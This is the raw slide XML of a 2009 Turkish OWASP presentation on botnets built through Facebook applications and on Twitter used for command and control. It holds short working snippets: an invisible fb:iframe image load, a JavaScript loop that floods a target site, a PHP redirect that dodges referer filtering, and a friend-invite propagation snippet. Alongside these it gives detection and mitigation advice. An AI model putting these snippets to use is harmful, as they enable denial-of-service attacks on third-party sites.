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E97-33DD-4C42-8292-870F68B6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F82-E0C7-4550-80BD-060FA8B0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6C0-9179-4D2F-9FB3-CFB3AE1D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2B0-1688-4130-8A7E-824D7BA4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2C5-0923-4B11-9FA2-862308C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7B5-32F3-4B12-BDF4-81A5077D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285-DCF8-46EB-9DC9-C21C3F14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3E4-E32E-45CF-BD01-CF1114AB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664-3BF7-4EE7-A8A9-5F02B486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5D8-F721-43E2-A034-3BE0A2B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325-642E-48DD-8BA8-E8243F1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0E9-52AF-412D-B392-A692120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152F-D966-4260-9DB4-F5053BA70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ttack-host/dummy-page?ref=victim-host/image1.jpg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earch.twitter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digininja.org/projects/kreiosc2.php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halilsaru@gmail.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ibrahimsaruhan@gmail.co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, Twitter and Bot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WASP Turkey Cha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 Application (How does it work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allback metaph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nteract with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The URL of the application associated with a registered application in Facebo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When the Facebook application URL requested, Facebook redirects the request to the ser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The application processes the request, communicates with Facebook using the Facebook Application Programming Interface (API) or Facebook Query Language (FQ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eturns Facebook Markup Language (FBML) to Facebook for pres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FaceBook AP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Web services programming interface for accessing core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rof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rien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ro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v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pho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for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other Facebook-centric function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log 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edire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update vie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Facebook Markup Language (FBML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TML-like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splay pages inside of the Facebook canv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Facebook Query Language (FQ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-based interface into Facebook d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milar to standard SQ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cess many Facebook database t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us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rie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rou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group_memb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event_memb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ho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lb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photo_ta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estric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SELECT statements must be performed one table at a ti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Join queries are not permit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</a:rPr>
              <a:t>ueries must be indexable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acebook Javascript (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FBJ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llows limited scripting function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lternative DOM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S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tandard JavaScri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s from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tandard JavaScri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hile a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ccessing a JavaScript property (such as document.href), FBJS uses a pair of get and set methods instead (getHref, setHref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W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le pr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oces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g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 scripting code inside of script elements, tacks on the application ID to function and variable nam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events the ability to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run any javascript code you w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FBJS transformed on the fly into JavaScript as the page is load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All variables and functions are prepended with a string like "xyz3455679_“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tric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on on w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hat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 with DOM el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vo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i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 cross-site-scripting attacks and hostile user behavi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Plat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ndards-based programming frame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bles developers to create applications that interact and integrate with core Facebook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Facebook applications are not installed directly onto the Facebook server. Instead, they are placed on the developer’s ser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Facebook applications are called by Facebook when the application URL is requ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ebook Application Diagram (How does it work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364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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838080" y="1905120"/>
            <a:ext cx="3429000" cy="1218960"/>
            <a:chOff x="838080" y="1905120"/>
            <a:chExt cx="3429000" cy="1218960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="TextBox 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838080" y="1905120"/>
              <a:ext cx="3429000" cy="52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. Facebook Sunucusu uygulama icin bir URL istegi aliyor (apps.facebook.com/uygulama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0" name="Straight Arrow Connector 12"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="99" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2551320" y="2427840"/>
              <a:ext cx="114840" cy="696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01" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4724280" y="1600200"/>
            <a:ext cx="3048120" cy="1143360"/>
            <a:chOff x="4724280" y="1600200"/>
            <a:chExt cx="3048120" cy="1143360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="TextBox 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4724280" y="1600200"/>
              <a:ext cx="3048120" cy="52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. Facebook Uygulamanin oldugu Sunucudaki Callback  URL yi cagiriy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3" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="102" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5637960" y="2123280"/>
              <a:ext cx="610200" cy="6206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04" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5410080" y="5105160"/>
            <a:ext cx="3276720" cy="1540800"/>
            <a:chOff x="5410080" y="5105160"/>
            <a:chExt cx="3276720" cy="1540800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="TextBox 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5410080" y="5486400"/>
              <a:ext cx="3276720" cy="1159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. Uygulama istegi degerlendiriyor, Facebook bilgisini API ya da FQL vasitasi ile Facebook’dan aliyor ve FBML araciligi ile kullanicinin gormesi icin FBML araciligi ile Facebook’a geri gonderiyo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6" name="Straight Arrow Connector 23"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="105" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7009560" y="5105160"/>
              <a:ext cx="38520" cy="381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07" name="Group 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="990720" y="4952520"/>
            <a:ext cx="3276360" cy="1327680"/>
            <a:chOff x="990720" y="4952520"/>
            <a:chExt cx="3276360" cy="1327680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name="TextBox 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="990720" y="5333760"/>
              <a:ext cx="3276360" cy="946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4. Facebook FBML cevabini aliyor ve cevabi Facebook Canvas icerisinde gosteriyor ve HTML yi istegi baslatan tarayiciya gonderiyo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9" name="Straight Arrow Connector 46"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="108" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2628720" y="4952520"/>
              <a:ext cx="876960" cy="381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kind of a Facebook Applic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simple ap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opular ap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 or Uti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n based Progr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Us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gram that creates Progra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-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facebook.com/terms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Your Content and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ration and Account Secur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ng Other People's Righ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bi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visions Applicable to Share Link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visions Applicable to Developers/Operators of Applications and Web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Advertisements on Faceboo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visions Applicable to Advertis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visions Applicable to Pag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- TOS -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not upload viruses or other malicious co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not collect users' content or information, or otherwise access Facebook, using automated means (such as harvesting bots, robots, spiders, or scrapers) without our permi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not use Facebook to do anything unlawful, misleading, malicious, or discriminat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not do anything that could disable, overburden, or impair the proper working of Facebook, such as a denial of service atta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cebook - TOS - Provisions Applicable to Develop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al Provisions Applicable to Developers/Operators of Applications and Websit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will only request data you need to operate your applic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will not use, display, or share a user's data in a manner inconsistent with the user's privacy setting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will delete all data you received from Facebook if we disable your application or ask you to do s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n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ollection o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oftware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robots, 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ots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, that run autonomously and automatic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otnet in its simplest form is an army of compromised computers that take orders from a bother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otnets are arguably the biggest threat that the Internet community has fac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popular Botnet Type: “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RC Channe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d Botne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tely Social Networking Sites based Botne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Revocation Em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833400" y="2052720"/>
            <a:ext cx="7477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net Creation in Fac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mage Re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line link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e of a linked object (usually an imag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it from one site into a web page belonging to a second si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second site is said to have an inline link to the site where the object is loca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hen a web site is visi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 first downloads the textual content in the form of an HTML docu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downloaded HTML document may call for other HTML  files to be proc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also permits absolute URLs that refer to images hosted on other servers (&lt;img src="http://www.example.com/picture.jpg" /&gt;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 browser downloads an HTML page containing such an image, the browser will contact the remote server to request the image con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net Creation in Fac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mage Refer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ngle line l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ho "&lt;fb:iframe frameborder=\"0\" width:0px height:0px src=\"http://www.w3schools.com/js/venus.jpg\" /&gt;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enough to create a DDOS Attack to the src Victim Site being w3schools.com in the above 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frame which downloads an image with a width and height set to 0p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wser fetches the page above and does not show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 width and height and see the pi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net Creation in Fac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ow to Create a large number of requests to the target site ?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mbed a sequence of image references in the malicious webpage, which can be done using either a sequence of IMG SRC instruc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avaScript loop that instructs the browser to load objects from the target ser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Loading image objects through Javascri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SCRIPT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ic= new Image(10,10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unction DDOS() {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 now = new Date(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ic.src='http://www.w3schools.com/js?'+now.getTime(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tTimeout ( "DDOS()", 10 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IFRAME name='parent' width="0%" src="page.htm" onLoad="DDOS()"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IFRA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agation of Facebook Bot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an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e it nice and fun !(Really importan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ertise it by using Facebook featur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s Fe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itation(Limit 20 a da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invite_tex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htmlentities($invite_tex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ho "&lt;fb:request-form type='Kim Silmis' content='$invite_text' action='index.php'  method='POST'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ite='true' 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ho "&lt;fb:multi-friend-selector showborder='true' max ='20' actiontext='Kim Silmiş programı ile siz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kadaş listesinden silenleri görmek ister  misiniz?' exclude_ids='$exclude_list' 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ho "&lt;/fb:request-form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facebook-&gt;api_client-&gt;notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de &lt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ref="http://apps.facebooks.com/kilsilmis"&gt;Kim silmis&lt;/a&gt; kullanarak zevkle zaman geçirebilirsiniz.  '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ection of Facebook Bot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ctim host must filter out all incoming traffic introduced by Facebook us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referer field of the HTTP reque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whether a request originates from facebook.com or n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p the attack traffic according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for a Facebook application developer to overcome this sit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rc=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ttack-host/dummy-page?ref=victim-host/image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?ph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f ($_GET["ref"]) { $ref=$_GET["ref"]; }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int("&lt;meta http-equiv=’refresh’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ent=’0; url=$ref’&gt;"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on of Facebook Bot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cial network providers should be careful with the use of client side technologies, like JavaScript, et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cial network operator should provide developers with a strict API, which is capable of giving access to resources only related to the syst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cations should run in an isolated environment imposing constraints to prevent the application from interacting with other Internet h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cebook Platform can cancel the use of fb:iframe tag, as this tag is used to load images hosted at the victim hos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 PoC Face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ics.forth.gr/dcs/Activities/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per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cebo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isc08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e social networking and micro-blogging servic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s users to send and read messages known a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wee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eets are text-based posts of up to 140 characters displayed on the author's profile page and delivered to the author'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oll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ders can restrict delivery to those in their circle of friends or allow open a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ame, Location, Bi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d People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itter, Other Networks, Emails, Suggested Use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@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rect Mess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earch.twitter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vori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ppet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uppetnets rely on websites that coerce web browsers to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ticipate in Malicious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Such activities includ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stributed denial-of-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worm propa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reconnaissance prob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uppetnets exploit the high degree of flexibility granted to the mechanisms comprising the web architec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A website under the control of an attacker can thereby transform a collection of web browsers into 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</a:t>
            </a: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stributed system that is effectively controlled by the attack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uppetnets can instruct any web browser to engage in malicious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itter Bot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ility to hide random commands in the large amount of data that is generated each da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really good API that would make integration eas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tion1: A protected twitter account that only the bots could rea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striction on who could see the commands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asy for Twitter to block the us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oC  supposedly exis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tion2:  Send Commands to random accounts and then have the Bot use the search feature to find the command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arder for Twitter to block the messages as the commands could be posted from any account to any other accoun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t would have to have a way to spot the commands in the general mess of other tweets out there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the bot can spot the commands then Twitter could also do the same matching and automatically drop those twee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 seemingly innocent commands, such as "check out this link ..." instead of saying download a fi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nocent commands would be hard for Twitter to block without upsetting legitimate use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Sugg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ing TinyURL to obfuscate comma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ing hash tags to represent certain thing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king bots to follow certain accounts to mark themselves as bot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itter - P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of of Concept bot which uses Twitter as its Command and Control channel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digininja.org/projects/kreiosc2.ph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iting for Defcon 2009 Video Presented by Kevin Johnson and Tom E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ekkur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brahim Halil Saruh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eboo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alilsaru@gmail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brahimsaruhan@gmail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ppet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Participation in puppetnets is dynam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ers join and participate unknowingly while surfing the n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y to maintain a reasonable population, withou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the burden of having to look for new victi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rder for the defenders to track and filter out attacks, as puppets ar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likely to be relatively short-l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ndirectly misuse browsers to attack third parti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ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pd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ppetnet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3880" y="1920960"/>
            <a:ext cx="6477120" cy="4127400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="TextBox 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6467400" y="4863960"/>
            <a:ext cx="1317600" cy="397080"/>
            <a:chOff x="6467400" y="4863960"/>
            <a:chExt cx="1317600" cy="397080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="TextBox 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6467400" y="4863960"/>
              <a:ext cx="13176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77120" y="4876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urban Si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TextBox 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="371520" y="3114720"/>
            <a:ext cx="2079720" cy="944640"/>
            <a:chOff x="371520" y="3114720"/>
            <a:chExt cx="2079720" cy="944640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="TextBox 6" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="371520" y="3114720"/>
              <a:ext cx="20797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0880" y="312408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ak komutlarini da iceren HTTP istek ve cevaplar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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2057400" y="1523880"/>
            <a:ext cx="2209680" cy="4865760"/>
            <a:chOff x="2057400" y="1523880"/>
            <a:chExt cx="2209680" cy="4865760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="TextBox 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2057400" y="1523880"/>
              <a:ext cx="2209680" cy="654480"/>
              <a:chOff x="2057400" y="1523880"/>
              <a:chExt cx="2209680" cy="654480"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="59" name="TextBox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1523880"/>
                <a:ext cx="2209680" cy="39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2066400" y="1535760"/>
                <a:ext cx="218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Zararli Web Sunucusu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TextBox 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2509920" y="6001560"/>
              <a:ext cx="1684440" cy="388080"/>
              <a:chOff x="2509920" y="6001560"/>
              <a:chExt cx="1684440" cy="388080"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="TextBox 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920" y="6001560"/>
                <a:ext cx="1684440" cy="38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518920" y="6010560"/>
                <a:ext cx="166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Web Istemciler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" name="TextBox 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4711680" y="3492360"/>
            <a:ext cx="1324080" cy="397080"/>
            <a:chOff x="4711680" y="3492360"/>
            <a:chExt cx="1324080" cy="397080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="TextBox 8" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4711680" y="3492360"/>
              <a:ext cx="1324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724280" y="35053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ak Trafig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be done via Puppet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age Refer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ading image objects through Javascri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 up pop-up Wind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reation of Frames to load remote o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browser that imposes restrictions on the location or type of the target referenced through these mechanis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ppetnet D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3505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more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ze of Puppetnet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fficient Firepower for a typical DDoS scenari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much “traffic” a browser can typically generate under the attacker’s com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extBox 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="749160" y="2048040"/>
            <a:ext cx="1476360" cy="671400"/>
            <a:chOff x="749160" y="2048040"/>
            <a:chExt cx="1476360" cy="671400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="72" name="TextBox 3" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="749160" y="2048040"/>
              <a:ext cx="14763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120" y="20574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repower of DDoS Attac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2365200" y="213372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TextBox 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2736720" y="1749600"/>
            <a:ext cx="2384640" cy="1341360"/>
            <a:chOff x="2736720" y="1749600"/>
            <a:chExt cx="2384640" cy="1341360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="76" name="TextBox 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2736720" y="1749600"/>
              <a:ext cx="2384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1752480"/>
              <a:ext cx="2362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umber of users concurrently viewing the malicious page on their web browse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TextBox 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5711760" y="1822320"/>
            <a:ext cx="3140280" cy="1219320"/>
            <a:chOff x="5711760" y="1822320"/>
            <a:chExt cx="3140280" cy="1219320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="79" name="TextBox 6" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5711760" y="1822320"/>
              <a:ext cx="3140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715000" y="182880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mount of bandwidth each of these users can generate towards the target serv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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260680" y="22096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ebook is a global social networking website that is operated and privately owned by Facebook, In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s c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friend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 them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date their personal profiles to notify friends about themsel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in networks organized by city, workplace, school, and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lication Development in Face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tions while creating FaceBook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n existing application to FaceBook by using ifra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n applic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 using FBML, FBJS, FQL and FB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reate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a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plication in FaceBoo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aceBook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book Markup Language(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BM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book Query Language(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Q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book Javascript(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B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02:33Z</dcterms:created>
  <dc:creator>Suleyman</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Bedirhan Urgun</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-09-26T18:47:18Z</dcterms:modified>
  <cp:revision>101</cp:revision>
  <dc:subject/>
  <dc:title>Facebook, Twitter ve Botnets</dc:title>
</cp:coreProperties>
</file>